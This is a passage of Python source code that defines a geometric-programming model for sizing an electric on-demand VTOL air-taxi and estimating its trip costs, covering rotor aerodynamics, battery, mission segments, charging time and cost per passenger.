purchase_price = Variable("purchase_price","-","Purchase price of the airframe")
vehicle_life = Variable("vehicle_life",20000*ureg.hour,"hours","Vehicle lifetime")
self.autonomousEnabled = autonomousEnabled
self.TOGW = TOGW
self.W_empty = W_empty
self.C_eff = C_eff
self.g = g
self.L_D_cruise = L_D_cruise
self.L_D_loiter = L_D_loiter
self.eta_cruise = eta_cruise
self.tailRotor_power_fraction_hover = tailRotor_power_fraction_hover
self.tailRotor_power_fraction_levelFlight = tailRotor_power_fraction_levelFlight
self.cost_per_weight = cost_per_weight
self.purchase_price = purchase_price
self.vehicle_life = vehicle_life
self.rotors = Rotors()
self.battery = Battery()
self.structure = Structure(self)
self.electricalSystem = ElectricalSystem()
self.avionics = Avionics(autonomousEnabled=autonomousEnabled)
self.components = [self.rotors,self.battery,self.structure,self.electricalSystem,self.avionics]
constraints = []
constraints += [g == self.battery.g]
constraints += [self.components]#all constraints implemented at component level
constraints += [L_D_loiter == ((3**0.5)/2.)*L_D_cruise]
constraints += [C_eff == self.battery.C_eff]#battery-capacity constraint
constraints += [W_empty >= sum(c.W for c in self.components)]#weight constraint
constraints += [purchase_price == cost_per_weight*self.structure.W]
return constraints
class Structure(Model):
def setup(self,aircraft):
TOGW = aircraft.TOGW
W = Variable("W","lbf","Empty weight")
weight_fraction = Variable("weight_fraction","-","Empty weight fraction")
self.W = W
self.weight_fraction = weight_fraction
return [W == weight_fraction*TOGW]
class Rotors(Model):
def performance(self,flightState):
return RotorsAero(self,flightState)
def setup(self):
R = Variable("R","ft","Propeller radius")
D = Variable("D","ft","Propeller diameter")
A = Variable("A","ft^2","Area of 1 rotor disk")
A_total = Variable("A_{total}","ft^2","Combined area of all rotor disks")
N = Variable("N","-","Number of rotors")
s = Variable("s",0.1,"-","Propeller solidity")
Cl_mean_max = Variable("Cl_{mean_{max}}","-","Maximum allowed mean lift coefficient")
W = Variable("W",0,"lbf","Rotor weight") #weight model not implemented yet
self.R = R
self.D = D
self.A = A
self.A_total = A_total
self.N = N
self.s = s
self.Cl_mean_max = Cl_mean_max
self.W = W
constraints = [A == math.pi*R**2, D==2*R, A_total==N*A,
Cl_mean_max == Cl_mean_max]
return constraints
class RotorsAero(Model):
def setup(self,rotors,flightState):
T = Variable("T","lbf","Total thrust")
T_perRotor = Variable("T_perRotor","lbf","Thrust per rotor")
T_A = Variable("T/A","lbf/ft**2","Disk loading")
Q_perRotor = Variable("Q_perRotor","lbf*ft","Torque per rotor")
P = Variable("P","kW","Total power")
P_perRotor = Variable("P_perRotor","kW","Power per rotor")
VT = Variable("VT","ft/s","Propeller tip speed")
omega = Variable("\omega","rpm","Propeller angular velocity")
MT = Variable("MT","-","Propeller tip Mach number")
MT_max = Variable("MT_max",0.9,"-","Maximum allowed tip Mach number")
CT = Variable("CT","-","Thrust coefficient")
CQ = Variable("CQ","-","Torque coefficient")
CP = Variable("CP","-","Power coefficient")
CPi = Variable("CPi","-","Induced (ideal) power coefficient")
CPp = Variable("CPp","-","Profile power coefficient")
Cl_mean = Variable("Cl_mean","-","Mean lift coefficient")
FOM = Variable("FOM","-","Figure of merit")
ki = Variable("ki",1.2,"-","Induced power factor")
Cd0 = Variable("Cd0",0.01,"-","Blade two-dimensional zero-lift drag coefficient")
p_ratio = Variable("p_{ratio}","-","Sound pressure ratio (p/p_{ref})")
x = Variable("x",500,"ft","Distance from source at which to calculate sound")
k3 = Variable("k3",6.804e-3,"s**3/ft**3","Sound-pressure constant")
R = rotors.R
A = rotors.A
A_total = rotors.A_total
N = rotors.N
s = rotors.s
Cl_mean_max = rotors.Cl_mean_max
rho = flightState.rho
a = flightState.a
self.T = T
self.T_perRotor = T_perRotor
self.T_A = T_A
self.Q_perRotor = Q_perRotor
self.P = P
self.P_perRotor = P_perRotor
self.VT = VT
self.omega = omega
self.MT = MT
self.MT_max = MT_max
self.CT = CT
self.CQ = CQ
self.CP = CP
self.CPi = CPi
self.CPp = CPp
self.Cl_mean = Cl_mean
self.FOM = FOM
self.ki = ki
self.Cd0 = Cd0
self.p_ratio = p_ratio
self.x = x
self.k3 = k3
constraints = [flightState]
#Top-level constraints
constraints += [T == N * T_perRotor,
P == N * P_perRotor]
constraints += [T_perRotor == 0.5*rho*(VT**2)*A*CT,
P_perRotor == 0.5*rho*(VT**3)*A*CP]
constraints += [T_A == T/A_total]
#Torque
constraints += [CQ == CP]
constraints += [Q_perRotor == 0.5*rho*(VT**2)*A*R*CQ]
#Performance model
constraints += [CPi == 0.5*CT**1.5,
CPp == 0.25*s*Cd0,
CP >= ki*CPi + CPp,
FOM == CPi / CP]
#Tip-speed constraints (upper limit on VT)
constraints += [VT == R*omega,
VT == MT * a,
MT <= MT_max]
#Mean lift coefficient constraints (lower limit on VT)
constraints += [Cl_mean == 3*CT/s,
Cl_mean <= Cl_mean_max]
#Noise model
constraints += [p_ratio == k3*((T*omega)/(rho*x))*(N*s)**-0.5]
return constraints
class Battery(Model):
def performance(self):
return BatteryPerformance(self)
#Requires a substitution or constraint for g (gravitational acceleration)
def setup(self):
g = Variable("g","m/s**2","Gravitational acceleration")
C = Variable("C","kWh","Battery capacity")
C_eff = Variable("C_{eff}","kWh","Effective battery capacity")
usable_energy_fraction = Variable("usable_energy_fraction",0.8,
"-","Percentage of the battery energy that can be used without damaging battery")
W = Variable("W","lbf","Battery weight")
m = Variable("m","kg","Battery mass")
C_m = Variable("C_m","Wh/kg","Battery energy density")
P_m = Variable("P_m",3000*ureg.W/ureg.kg,"W/kg","Battery power density")
P_max = Variable("P_{max}","kW","Battery maximum power")
cost_per_C = Variable("cost_per_C","kWh**-1","Battery cost per unit energy stored")
purchase_price = Variable("purchase_price","-","Purchase price of the battery")
cycle_life = Variable("cycle_life",2000,"-",
"Number of cycles before battery needs replacement")
self.g = g
self.C = C
self.C_eff = C_eff
self.usable_energy_fraction = usable_energy_fraction
self.W = W
self.m = m
self.C_m = C_m
self.P_m = P_m
self.P_max = P_max
self.cost_per_C = cost_per_C
self.purchase_price = purchase_price
self.cycle_life = cycle_life
constraints = []
constraints += [C==m*C_m, W==m*g]
constraints += [C_eff == usable_energy_fraction*C, P_max==P_m*m]
constraints += [purchase_price == cost_per_C*C]
return constraints
class BatteryPerformance(Model):
def setup(self,battery):
E = Variable("E","kWh","Electrical energy used during segment")
P = Variable("P","kW","Power draw during segment")
t = Variable("t","s","Time over which battery is providing power")
self.E = E
self.P = P
self.t = t
constraints = [E==P*t, P<=battery.P_max]
return constraints
class Crew(Model):
def setup(self,mission_type="piloted"):
W_oneCrew = Variable("W_{oneCrew}",190,"lbf","Weight of 1 crew member")
N_crew = Variable("N_{crew}",1,"-","Number of crew members (if present)")
constraints = []
if mission_type == "autonomous":
W = Variable("W",0,"lbf","Total weight")
if mission_type == "piloted":
W = Variable("W","lbf","Total weight")
constraints += [W == N_crew*W_oneCrew]
self.W_oneCrew = W_oneCrew
self.N_crew = N_crew
self.W = W
return constraints
class Passengers(Model):
def setup(self):
W_onePassenger = Variable("W_{onePassenger}",200,"lbf","Weight of 1 passenger")
N_passengers = Variable("N_{passengers}","-","Number of passengers")
W = Variable("W","lbf","Total weight")
self.W_onePassenger = W_onePassenger
self.N_passengers = N_passengers
self.W = W
return [W == N_passengers*W_onePassenger]
class ElectricalSystem(Model):
def performance(self):
return ElectricalSystemPerformance(self)
def setup(self):
W = Variable("W",0,"lbf","Electrical power system weight")
eta = Variable("\eta","-","Electrical power system efficiency")
self.W = W
self.eta = eta
constraints = []
return constraints
class ElectricalSystemPerformance(Model):
def setup(self,electricalSystem):
P_in = Variable("P_{in}","kW","Input power (from the battery)")
P_out = Variable("P_{out}","kW","Output power (to the motor or motors)")
eta = electricalSystem.eta
self.P_in = P_in
self.P_out = P_out
self.eta = eta
constraints = []
constraints += [P_out == eta*P_in]
return constraints
class Avionics(Model):
def setup(self,autonomousEnabled=False):
W = Variable("W",0,"lbf","Weight of the avionics")
if autonomousEnabled:
purchase_price = Variable("purchase_price",60000,"-",
"Purchase price of the avionics (Uber estimate)")
else:
purchase_price = Variable("purchase_price",1,"-",
"Purchase price of the avionics (negligibly small)")
self.purchase_price = purchase_price
self.W = W
constraints = []
return constraints
class FlightState(Model):
def setup(self,h):
atmospheric_data = stdatmo(h)
rho = atmospheric_data["\rho"].to(ureg.kg/ureg.m**3)
a = atmospheric_data["a"].to(ureg.ft/ureg.s)
rho = Variable("\rho",rho,"kg/m^3","Air density")
a = Variable("a",a,"ft/s","Speed of sound")
self.rho = rho
self.a = a
constraints = []
return constraints
class Hover(Model):
#t should be set via substitution
def setup(self,mission,aircraft,state):
E = Variable("E","kWh","Electrical energy used during hover segment")
P_battery = Variable("P_{battery}","kW","Power drawn (from batteries) during hover segment")
P_rotors = Variable("P_{rotors}","kW","Power used (by lifting rotors) during hover segment")
P_tailRotor = Variable("P_{tailRotor}","kW","Power used (by tail rotor) during hover segment")
tailRotor_power_fraction = Variable("tailRotor_power_fraction",
"-","Tail-rotor power as a fraction of lifting-rotors power")
T = Variable("T","lbf","Total thrust (from rotors) during hover segment")
T_A = Variable("T/A","lbf/ft**2","Disk loading during hover segment")
t = Variable("t","s","Time in hover segment")
W = mission.W
self.E = E
self.P_battery = P_battery
self.P_rotors = P_rotors
self.P_tailRotor = P_tailRotor
self.tailRotor_power_fraction = tailRotor_power_fraction
self.T = T
self.T_A = T_A
self.t = t
self.W = W
self.rotorPerf = aircraft.rotors.performance(state)
self.batteryPerf = aircraft.battery.performance()
self.electricalSystemPerf = aircraft.electricalSystem.performance()
constraints = []
constraints += [self.rotorPerf, self.batteryPerf, self.electricalSystemPerf]
constraints += [P_rotors==self.rotorPerf.P,T==self.rotorPerf.T,
T_A==self.rotorPerf.T_A]
constraints += [self.electricalSystemPerf.P_in == P_battery,
self.electricalSystemPerf.P_out >= P_rotors + P_tailRotor]
constraints += [E==self.batteryPerf.E,t==self.batteryPerf.t,
P_battery==self.batteryPerf.P]
constraints += [T == W]
constraints += [P_tailRotor == tailRotor_power_fraction*P_rotors]
return constraints
class LevelFlight(Model):
#Substitution required for either segment_range or t (loiter time).
def setup(self,mission,aircraft):
E = Variable("E","kWh","Electrical energy used during level-flight segment")
P_battery = Variable("P_{battery}","kW","Power drawn (from batteries) during segment")
P_cruise = Variable("P_{cruise}","kW","Power used (by propulsion system) during cruise segment")
P_tailRotor = Variable("P_{tailRotor}","kW","Power used (by tail rotor) during hover segment")
tailRotor_power_fraction = Variable("tailRotor_power_fraction",
"-","Tail-rotor power as a fraction of cruise power")
T = Variable("T","lbf","Thrust during level-flight segment")
D = Variable("D","lbf","Drag during level-flight segment")
t = Variable("t","s","Time in level-flight segment")
segment_range = Variable("segment_range","nautical_mile",
"Distance travelled during segment")
V = Variable("V","mph","Velocity during segment")
L_D = Variable("L_D","-","Segment lift-to-drag ratio")
W = mission.W
eta_cruise = aircraft.eta_cruise
self.E = E
self.P_battery = P_battery
self.P_cruise = P_cruise
self.P_tailRotor = P_tailRotor
self.tailRotor_power_fraction = tailRotor_power_fraction
self.T = T
self.D = D
self.t = t
self.segment_range = segment_range
self.V = V
self.L_D = L_D
constraints = []
self.batteryPerf = aircraft.battery.performance()
self.electricalSystemPerf = aircraft.electricalSystem.performance()
constraints += [self.batteryPerf, self.electricalSystemPerf]
constraints += [E==self.batteryPerf.E, P_battery==self.batteryPerf.P,
t==self.batteryPerf.t]
constraints += [self.electricalSystemPerf.P_in == P_battery,
self.electricalSystemPerf.P_out >= P_cruise + P_tailRotor]
constraints += [segment_range==V*t,eta_cruise*P_cruise==T*V,T==D,W==L_D*D]
constraints += [P_tailRotor == tailRotor_power_fraction*P_cruise]
return constraints
class TimeOnGround(Model):
#Mission segment for charging and passenger drop-off/pick-up
def setup(self,mission):
E_mission = mission.E_mission
t = Variable("t","s","Time spent on ground")
t_passenger = Variable("t_{passenger}",5,"minute",
"Time required to load/unload passengers and conduct safety checks")
t_charge = Variable("t_{charge}","s","Time required to fully charge the battery")
charger_power = Variable("charger_power","kW","Charger power")
eta_charger = Variable("\eta_{charger}",0.9,"-","Charging efficiency")
E_charger = Variable("E_{charger}","kWh","Energy supplied by charger")
self.t = t
self.t_passenger = t_passenger
self.t_charge = t_charge
self.charger_power = charger_power
self.eta_charger = eta_charger
self.E_charger = E_charger
constraints = []
constraints += [t >= t_passenger, t >= t_charge]
constraints += [E_mission == eta_charger*E_charger]
constraints += [E_charger == charger_power*t_charge]
return constraints
class OnDemandSizingMission(Model):
#Mission the aircraft must be able to fly. No economic analysis.
def setup(self,aircraft,reserve_type="FAA_heli",mission_type="piloted"):
if not(aircraft.autonomousEnabled) and (mission_type != "piloted"):
raise ValueError("Autonomy is not enabled for Aircraft() model.")
W = Variable("W_{mission}","lbf","Weight of the aircraft during the mission")
mission_range = Variable("mission_range","nautical_mile","Mission range")
t_hover = Variable("t_{hover}","s","Time in hover")
E_mission = Variable("E_{mission}","kWh","Electrical energy used during mission")
V_cruise = Variable("V_{cruise}","mph","Aircraft cruising speed")
V_loiter = Variable("V_{loiter}","mph","Aircraft loiter speed")
T_A = Variable("T/A","lbf/ft**2","Disk loading")
C_eff = aircraft.battery.C_eff #effective battery capacity
self.W = W
self.mission_range = mission_range
self.t_hover = t_hover
self.E_mission = E_mission
self.V_cruise = V_cruise
self.V_loiter = V_loiter
self.T_A = T_A
self.mission_type = mission_type
self.crew = Crew(mission_type=mission_type)
self.passengers = Passengers()
hoverState = FlightState(h=0*ureg.ft)
constraints = []
self.fs0 = Hover(self,aircraft,hoverState) #takeoff
self.fs1 = LevelFlight(self,aircraft) #fly to destination
self.fs2 = LevelFlight(self,aircraft) #reserve
constraints += [self.fs1.L_D == aircraft.L_D_cruise]
constraints += [self.fs1.V == V_cruise]
#Reserve segment
if reserve_type == "FAA_aircraft" or reserve_type == "FAA_heli":
constraints += [self.fs2.L_D == aircraft.L_D_loiter]
constraints += [self.fs2.V == V_loiter]
if reserve_type == "FAA_aircraft":
#30-minute loiter time, as per VFR rules for aircraft (daytime only)
t_loiter = Variable("t_{loiter}",30,"minutes","Loiter time")
elif reserve_type == "FAA_heli":
#20-minute loiter time, as per VFR rules for helicopters
t_loiter = Variable("t_{loiter}",20,"minutes","Loiter time")
self.t_loiter = t_loiter
constraints += [t_loiter == self.fs2.t]
if reserve_type == "Uber":#2-nautical-mile diversion distance; used by McDonald & German
constraints += [self.fs2.L_D == aircraft.L_D_cruise]
constraints += [self.fs2.V == V_cruise]
R_divert = Variable("R_{divert}",2,"nautical_mile","Diversion distance")
self.R_divert = R_divert
constraints += [R_divert == self.fs2.segment_range]
self.fs3 = Hover(self,aircraft,hoverState)#landing again
self.flight_segments = [self.fs0, self.fs1, self.fs2, self.fs3]
self.levelFlight_segments = [self.fs1, self.fs2]
self.hover_segments = [self.fs0, self.fs3] #not including loiter
#Power and energy consumption by mission segment
with Vectorize(len(self.flight_segments)):
P_battery = Variable("P_{battery}","kW","Segment power draw")
E = Variable("E","kWh","Segment energy use")
#Data from hover segments
with Vectorize(len(self.hover_segments)):
CT = Variable("CT","-","Thrust coefficient")
CP = Variable("CP","-","Power coefficient")
Q_perRotor = Variable("Q_perRotor","lbf*ft","Torque per lifting rotor")
T_perRotor = Variable("T_perRotor","lbf","Thrust per lifting rotor")
P = Variable("P","kW","Total power supplied to all lifting rotors")
P_perRotor = Variable("P_perRotor","kW","Power per lifting rotor")
VT = Variable("VT","ft/s","Propeller tip speed")
omega = Variable("\omega","rpm","Propeller angular velocity")
MT = Variable("MT","-","Propeller tip Mach number")
FOM = Variable("FOM","-","Figure of merit")
p_ratio = Variable("p_{ratio}","-","Sound pressure ratio in hover")
constraints += [self.flight_segments]
constraints += [self.crew, self.passengers]
constraints += [W >= aircraft.W_empty + self.passengers.W \
+ self.crew.W]
constraints += [aircraft.TOGW >= W]
constraints += [mission_range == self.fs1.segment_range]
constraints += [hoverState]
constraints += [V_loiter == ((1/3.)**(1/4.))*V_cruise]
constraints += [E_mission >= sum(c.E for c in self.flight_segments)]
constraints += [C_eff >= E_mission]
constraints += [T_A == segment.rotorPerf.T_A for i,segment in enumerate(self.hover_segments)]
constraints += [aircraft.tailRotor_power_fraction_levelFlight == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.levelFlight_segments)]
constraints += [aircraft.tailRotor_power_fraction_hover == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.hover_segments)]
constraints += [t_hover == segment.t for i,segment in enumerate(self.hover_segments)]
constraints += [P_battery[i] == segment.P_battery for i,segment in enumerate(self.flight_segments)]
constraints += [E[i] == segment.E for i,segment in enumerate(self.flight_segments)]
constraints += [CT[i] == segment.rotorPerf.CT for i,segment in enumerate(self.hover_segments)]
constraints += [CP[i] == segment.rotorPerf.CP for i,segment in enumerate(self.hover_segments)]
constraints += [Q_perRotor[i] == segment.rotorPerf.Q_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [T_perRotor[i] == segment.rotorPerf.T_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [P[i] == segment.rotorPerf.P for i,segment in enumerate(self.hover_segments)]
constraints += [P_perRotor[i] == segment.rotorPerf.P_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [VT[i] == segment.rotorPerf.VT for i,segment in enumerate(self.hover_segments)]
constraints += [omega[i] == segment.rotorPerf.omega for i,segment in enumerate(self.hover_segments)]
constraints += [MT[i] == segment.rotorPerf.MT for i,segment in enumerate(self.hover_segments)]
constraints += [FOM[i] == segment.rotorPerf.FOM for i,segment in enumerate(self.hover_segments)]
constraints += [p_ratio[i] == segment.rotorPerf.p_ratio for i,segment in enumerate(self.hover_segments)]
return constraints
class OnDemandRevenueMission(Model):
#Revenue-generating mission. Exactly the same code as OnDemandDeadheadMission.
def setup(self,aircraft,mission_type="piloted"):
if not(aircraft.autonomousEnabled) and (mission_type != "piloted"):
raise ValueError("Autonomy is not enabled for Aircraft() model.")
W = Variable("W_{mission}","lbf","Weight of the aircraft during the mission")
mission_range = Variable("mission_range","nautical_mile","Mission range")
t_hover = Variable("t_{hover}","s","Time in hover")
V_cruise = Variable("V_{cruise}","mph","Aircraft cruising speed")
T_A = Variable("T/A","lbf/ft**2","Disk loading")
C_eff = aircraft.battery.C_eff #effective battery capacity
t_mission = Variable("t_{mission}","minutes","Time to complete mission (including charging)")
t_flight = Variable("t_{flight}","minutes","Time in flight")
E_mission = Variable("E_{mission}","kWh","Electrical energy used during mission")
self.W = W
self.mission_range = mission_range
self.t_hover = t_hover
self.V_cruise = V_cruise
self.T_A = T_A
self.C_eff = C_eff
self.t_mission = t_mission
self.t_flight = t_flight
self.E_mission = E_mission
self.mission_type = mission_type
self.crew = Crew(mission_type=mission_type)
self.passengers = Passengers()
hoverState = FlightState(h=0*ureg.ft)
self.fs0 = Hover(self,aircraft,hoverState)#takeoff
self.fs1 = LevelFlight(self,aircraft)#fly to destination
self.fs2 = Hover(self,aircraft,hoverState)#landing
self.time_on_ground = TimeOnGround(self)
self.segments = [self.fs0, self.fs1, self.fs2, self.time_on_ground]
self.flight_segments = [self.fs0, self.fs1, self.fs2]
self.levelFlight_segments = [self.fs1]
self.hover_segments = [self.fs0, self.fs2]
#Power and energy consumption by mission segment
with Vectorize(len(self.flight_segments)):
P_battery = Variable("P_{battery}","kW","Segment power draw")
E = Variable("E","kWh","Segment energy use")
#Data from hover segments
numHoverSegments = len(self.hover_segments)
with Vectorize(numHoverSegments):
CT = Variable("CT","-","Thrust coefficient")
CP = Variable("CP","-","Power coefficient")
Q_perRotor = Variable("Q_perRotor","lbf*ft","Torque per lifting rotor")
T_perRotor = Variable("T_perRotor","lbf","Thrust per lifting rotor")
P = Variable("P","kW","Total power supplied to all lifting rotors")
P_perRotor = Variable("P_perRotor","kW","Power per lifting rotor")
VT = Variable("VT","ft/s","Propeller tip speed")
omega = Variable("\omega","rpm","Propeller angular velocity")
MT = Variable("MT","-","Propeller tip Mach number")
FOM = Variable("FOM","-","Figure of merit")
p_ratio = Variable("p_{ratio}","-","Sound pressure ratio in hover")
constraints = []
constraints += [self.fs0.T_A == T_A]
constraints += [self.fs1.L_D == aircraft.L_D_cruise]
constraints += [self.fs1.V == V_cruise]
constraints += [self.segments]
constraints += [self.crew,self.passengers]
constraints += [W >= aircraft.W_empty + self.passengers.W \
+ self.crew.W]
constraints += [aircraft.TOGW >= W]
constraints += [mission_range == self.fs1.segment_range]
constraints += [p_ratio == self.fs0.rotorPerf.p_ratio]
constraints += hoverState
constraints += [E_mission >= sum(c.E for c in self.flight_segments)]
constraints += [C_eff >= E_mission]
constraints += [aircraft.tailRotor_power_fraction_levelFlight == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.levelFlight_segments)]
constraints += [aircraft.tailRotor_power_fraction_hover == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.hover_segments)]
constraints += [t_hover == segment.t for i,segment in enumerate(self.hover_segments)]
constraints += [t_flight >= sum(c.t for c in self.flight_segments)]
constraints += [t_mission >= t_flight + self.time_on_ground.t]
constraints += [P_battery[i] == segment.P_battery for i,segment in enumerate(self.flight_segments)]
constraints += [E[i] == segment.E for i,segment in enumerate(self.flight_segments)]
constraints += [CT[i] == segment.rotorPerf.CT for i,segment in enumerate(self.hover_segments)]
constraints += [CP[i] == segment.rotorPerf.CP for i,segment in enumerate(self.hover_segments)]
constraints += [Q_perRotor[i] == segment.rotorPerf.Q_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [T_perRotor[i] == segment.rotorPerf.T_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [P[i] == segment.rotorPerf.P for i,segment in enumerate(self.hover_segments)]
constraints += [P_perRotor[i] == segment.rotorPerf.P_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [VT[i] == segment.rotorPerf.VT for i,segment in enumerate(self.hover_segments)]
constraints += [omega[i] == segment.rotorPerf.omega for i,segment in enumerate(self.hover_segments)]
constraints += [MT[i] == segment.rotorPerf.MT for i,segment in enumerate(self.hover_segments)]
constraints += [FOM[i] == segment.rotorPerf.FOM for i,segment in enumerate(self.hover_segments)]
constraints += [p_ratio[i] == segment.rotorPerf.p_ratio for i,segment in enumerate(self.hover_segments)]
return constraints
class OnDemandDeadheadMission(Model):
#Deadhead mission. Exactly the same code as OnDemandRevenueMission.
def setup(self,aircraft,mission_type="piloted"):
if not(aircraft.autonomousEnabled) and (mission_type != "piloted"):
raise ValueError("Autonomy is not enabled for Aircraft() model.")
W = Variable("W_{mission}","lbf","Weight of the aircraft during the mission")
mission_range = Variable("mission_range","nautical_mile","Mission range")
t_hover = Variable("t_{hover}","s","Time in hover")
V_cruise = Variable("V_{cruise}","mph","Aircraft cruising speed")
T_A = Variable("T/A","lbf/ft**2","Disk loading")
C_eff = aircraft.battery.C_eff #effective battery capacity
t_mission = Variable("t_{mission}","minutes","Time to complete mission (including charging)")
t_flight = Variable("t_{flight}","minutes","Time in flight")
E_mission = Variable("E_{mission}","kWh","Electrical energy used during mission")
self.W = W
self.mission_range = mission_range
self.t_hover = t_hover
self.V_cruise = V_cruise
self.T_A = T_A
self.C_eff = C_eff
self.t_mission = t_mission
self.t_flight = t_flight
self.E_mission = E_mission
self.mission_type = mission_type
self.crew = Crew(mission_type=mission_type)
self.passengers = Passengers()
hoverState = FlightState(h=0*ureg.ft)
self.fs0 = Hover(self,aircraft,hoverState)#takeoff
self.fs1 = LevelFlight(self,aircraft)#fly to destination
self.fs2 = Hover(self,aircraft,hoverState)#landing
self.time_on_ground = TimeOnGround(self)
self.segments = [self.fs0, self.fs1, self.fs2, self.time_on_ground]
self.flight_segments = [self.fs0, self.fs1, self.fs2]
self.levelFlight_segments = [self.fs1]
self.hover_segments = [self.fs0, self.fs2]
#Power and energy consumption by mission segment
with Vectorize(len(self.flight_segments)):
P_battery = Variable("P_{battery}","kW","Segment power draw")
E = Variable("E","kWh","Segment energy use")
#Data from hover segments
numHoverSegments = len(self.hover_segments)
with Vectorize(numHoverSegments):
CT = Variable("CT","-","Thrust coefficient")
CP = Variable("CP","-","Power coefficient")
Q_perRotor = Variable("Q_perRotor","lbf*ft","Torque per lifting rotor")
T_perRotor = Variable("T_perRotor","lbf","Thrust per lifting rotor")
P = Variable("P","kW","Total power supplied to all lifting rotors")
P_perRotor = Variable("P_perRotor","kW","Power per lifting rotor")
VT = Variable("VT","ft/s","Propeller tip speed")
omega = Variable("\omega","rpm","Propeller angular velocity")
MT = Variable("MT","-","Propeller tip Mach number")
FOM = Variable("FOM","-","Figure of merit")
p_ratio = Variable("p_{ratio}","-","Sound pressure ratio in hover")
constraints = []
constraints += [self.fs0.T_A == T_A]
constraints += [self.fs1.L_D == aircraft.L_D_cruise]
constraints += [self.fs1.V == V_cruise]
constraints += [self.segments]
constraints += [self.crew,self.passengers]
constraints += [W >= aircraft.W_empty + self.passengers.W \
+ self.crew.W]
constraints += [aircraft.TOGW >= W]
constraints += [mission_range == self.fs1.segment_range]
constraints += [p_ratio == self.fs0.rotorPerf.p_ratio]
constraints += hoverState
constraints += [E_mission >= sum(c.E for c in self.flight_segments)]
constraints += [C_eff >= E_mission]
constraints += [aircraft.tailRotor_power_fraction_levelFlight == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.levelFlight_segments)]
constraints += [aircraft.tailRotor_power_fraction_hover == segment.tailRotor_power_fraction \
for i,segment in enumerate(self.hover_segments)]
constraints += [t_hover == segment.t for i,segment in enumerate(self.hover_segments)]
constraints += [t_flight >= sum(c.t for c in self.flight_segments)]
constraints += [t_mission >= t_flight + self.time_on_ground.t]
constraints += [P_battery[i] == segment.P_battery for i,segment in enumerate(self.flight_segments)]
constraints += [E[i] == segment.E for i,segment in enumerate(self.flight_segments)]
constraints += [CT[i] == segment.rotorPerf.CT for i,segment in enumerate(self.hover_segments)]
constraints += [CP[i] == segment.rotorPerf.CP for i,segment in enumerate(self.hover_segments)]
constraints += [Q_perRotor[i] == segment.rotorPerf.Q_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [T_perRotor[i] == segment.rotorPerf.T_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [P[i] == segment.rotorPerf.P for i,segment in enumerate(self.hover_segments)]
constraints += [P_perRotor[i] == segment.rotorPerf.P_perRotor for i,segment in enumerate(self.hover_segments)]
constraints += [VT[i] == segment.rotorPerf.VT for i,segment in enumerate(self.hover_segments)]
constraints += [omega[i] == segment.rotorPerf.omega for i,segment in enumerate(self.hover_segments)]
constraints += [MT[i] == segment.rotorPerf.MT for i,segment in enumerate(self.hover_segments)]
constraints += [FOM[i] == segment.rotorPerf.FOM for i,segment in enumerate(self.hover_segments)]
constraints += [p_ratio[i] == segment.rotorPerf.p_ratio for i,segment in enumerate(self.hover_segments)]
return constraints
class OnDemandMissionCost(Model):
#Includes both revenue and deadhead missions
def setup(self,aircraft,revenue_mission,deadhead_mission):
N_passengers = revenue_mission.passengers.N_passengers
trip_distance = revenue_mission.mission_range
cpt = Variable("cost_per_trip","-","Cost (in dollars) for one trip")
cpt_revenue = Variable("revenue_cost_per_trip","-",
"Portion of the cost per trip incurred during the revenue-generating flights")
cpt_deadhead = Variable("deadhead_cost_per_trip","-",
"Portion of the cost per trip incurred during the deadhead flights")
cptpp = Variable("cost_per_trip_per_passenger","-",
"Cost (in dollars) for one trip, per passenger carried on revenue trip")
cpt_seat_mile = Variable("cost_per_seat_mile","mile**-1",
"Cost per trip, per seat (passenger) mile")
deadhead_ratio = Variable("deadhead_ratio","-","Number of deadhead missions per total missions")
NdNr = Variable("N_{deadhead}/N_{typical}","-",
"Number of deadhead missions per typical mission")
revenue_mission_costs = RevenueMissionCost(aircraft,revenue_mission)
deadhead_mission_costs = DeadheadMissionCost(aircraft,deadhead_mission)
self.cpt = cpt
self.cpt_revenue = cpt_revenue
self.cpt_deadhead = cpt_deadhead
self.cptpp = cptpp
self.cpt_seat_mile = cpt_seat_mile
self.deadhead_ratio = deadhead_ratio
self.NdNr = NdNr
self.revenue_mission_costs = revenue_mission_costs
self.deadhead_mission_costs = deadhead_mission_costs
constraints = []
constraints += [revenue_mission_costs, deadhead_mission_costs]
constraints += [NdNr >= deadhead_ratio*(NdNr+1)]
constraints += [cpt_revenue == revenue_mission_costs.cost_per_mission]
constraints += [cpt_deadhead == NdNr*deadhead_mission_costs.cost_per_mission]
constraints += [cpt >= cpt_revenue + cpt_deadhead]
constraints += [cpt == cptpp*N_passengers]
constraints += [cpt == cpt_seat_mile*N_passengers*trip_distance]
return constraints
class RevenueMissionCost(Model):
#Cost for one mission. Exactly the same code as DeadheadMissionCost.
def setup(self,aircraft,mission):
t_mission = mission.t_mission
cost_per_mission = Variable("cost_per_mission","-","Cost per mission")
cost_per_time = Variable("cost_per_time","hr**-1","Cost per unit mission time")
capital_expenses = CapitalExpenses(aircraft,mission)
operating_expenses = OperatingExpenses(aircraft,mission)
expenses = [capital_expenses, operating_expenses]
self.cost_per_mission = cost_per_mission
self.cost_per_time = cost_per_time
self.capital_expenses = capital_expenses
self.operating_expenses = operating_expenses
constraints = []
constraints += [expenses]
constraints += [cost_per_mission >= sum(c.cost_per_mission for c in expenses)]
constraints += [cost_per_mission == t_mission*cost_per_time]
return constraints
class DeadheadMissionCost(Model):
#Cost for one mission. Exactly the same code as RevenueMissionCost.
def setup(self,aircraft,mission):
t_mission = mission.t_mission
cost_per_mission = Variable("cost_per_mission","-","Cost per mission")
cost_per_time = Variable("cost_per_time","hr**-1","Cost per unit mission time")
capital_expenses = CapitalExpenses(aircraft,mission)
operating_expenses = OperatingExpenses(aircraft,mission)
expenses = [capital_expenses, operating_expenses]
self.cost_per_mission = cost_per_mission
self.cost_per_time = cost_per_time
self.capital_expenses = capital_expenses
self.operating_expenses = operating_expenses
constraints = []
constraints += [expenses]
